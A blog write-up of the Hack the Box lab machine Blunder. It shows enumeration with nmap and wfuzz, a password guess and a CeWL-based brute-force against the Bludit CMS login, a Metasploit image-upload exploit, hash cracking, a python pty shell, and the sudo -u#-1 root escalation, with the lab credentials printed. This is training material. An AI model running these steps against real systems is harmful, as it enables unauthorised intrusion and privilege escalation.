Post

HTB: Blunder – Write‑up

A write-up and walkthrough for the Hack the Box machine: Blunder

Posted
By Xyniath
4 min read
HTB: Blunder – Write‑up

Info

  • Target: 10.10.10.191
  • Difficulty: Easy
  • OS: Linux

Initial Nmap Scan

An Nmap scan was performed to identify any open ports and running services

1

nmap -sC -sV -p- -oN nmap 10.10.10.191

Nmap Scan

Shows that 2 ports were discovered:

  • Port 22 (FTP) closed
  • Port 80 (HTTP) open

With port 80 being the only accessible service, further enumeration focused on the web application.

Enumerating the Webserver

Webpage

The main page presents a CMS-based website. Whilst browsing any exposed links, a fuzz content discovery scan was executed using the SecLists wordlist.

1

wfuzz -c -w /root/htb/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u 10.10.10.191/FUZZ.txt
  • --hc 404,403 was used to hide response clutter.

Fuzz

The scan identified an exposed /todo.txt file which disclosed:

  • A CMS is in use
  • FTP has been disabled
  • fergus is a possible user target

todo.txt

Given that a user may need to log in, enumeration of typical directories were tested:

  • login/
  • admin/ -> Discovered a login portal

Login

This login page shows that we’re dealing with the Bludit CMS. Performing basic page source analysis did not reveal a specific version. A quick page source inspection to see a returned version of can find a version number which I could not. So I search for an exploit for Bludit.

A Metasploit module for a php image upload vulnerability exists, though requires authentication: Metasploit Search

Given that there weren’t a large volume of blog posts, a hint to enumerate for any clues within each post was given - to search for any unusual words, or potentially typos.

The Stephen King post especially - a name was typed as ‘FirstNameLastName’. “RolandDeschain” (A character from Stephen King’s The Dark Tower Series) this could’ve been the unsual typo mentioned as the rest of the site seemed well-written.

Entering RolandDeschain alongside the username of fergus we gain access to the CMS platform.

USERNAME - fergus

PASSWORD - RolandDeschain

Logged In

2026 Update: Alternate (and preferred) of getting the password:

  • Trying to brute force a password would have caused a temporary account lockout from rate-limiting.

  • Bludit is an open-source CMS - the source code is publicly available on GitHub. Searching for ‘version’ will lead us to a file that shows the version of bludit being used. Bludit Version - GitHub. Navigating to http://10.10.10.191/bl-plugins/version/metadata.json would have revealed a version of 3.9.2
  • An Auth Bruteforce Bypass exploit for Bludit versions up to and including 3.9.2 could work here.
  • Using CeWL we could spider the website and find words longer than 6 letters that could be potential password candidates. 
    1

    cewl -w wordlist.txt -m 6 http://10.10.10.191

    With this wordlist the authentication bypass exploit can be manipulated to attempt a brute-force of passwords against then fergus user, ultimately giving us RolandDeschain as the password.

Exploiting BLUDIT

After gaining access, we can load metasploit

Metasploit Search

1

use exploit/linux/http/bludit_upload_images_exec

Entered the appropriate options: Metasploit Module Options

After successful execution, using the getuid command shows that access to the www-data account getuid

Getting user.txt

Whilst navigating the system, in the bludit/databases/ directory, there is a users.php file which contains a list of users and their salted hashed passwords. The admin password was uncrackable.

Outside of the initial directory, a newer (and currently unused) version of bludit was present, this version’s users.php file contained a new user named hugo, with a hash of: faca404fd5c0a31cf1897b823c695c85cffeb98d

Initially tried to crack with john and the rockyou.txt wordlist with no success. However, the crackstation rainbow table cracked the password: Cracked Hash

Password120

With password re-use there’s a strong chance its possible to drop into a shell and switch user.

The currently limited shell environmen requires the need to spawn an interactive shell. Running which python shows that python is installed. Shell

The following python one-liner can spawn an interactive shell

1

python -c "import pty;pty.spawn('/bin/bash')"

TTY Shell

It is now possible to switch user to hugo

Switch User

user.txt can be read

1

cat /home/hugo/user.txt

Gaining root.txt

With user, the id command can be run to see if there are any special privileges id

Running find / -perm 1001 2>/dev/null just to check for any SUID misconfigurations, but no results are returned:

find

Checking for any sudo privileges with sudo -L sudo -l result

(ALL, !root) /bin/bash is a strange sudo configuration as it allows any user to run an elevated shell except for the root user.

The following POC exploit shows that the following command can be used to elevate to root.

Which effectively runs:

1

sudo -u#-1 /bin/bash

Bypass works as a UID of -1 resolves to 0 which bypasses the !root resulting in privilege escalation root

With root, it is then possible to read root.txt

1

cat /root/root.txt
Writeups, HTB
cve easy hack the box write-up cms linux fuzzing metasploit
This post is licensed under CC BY 4.0 by the author.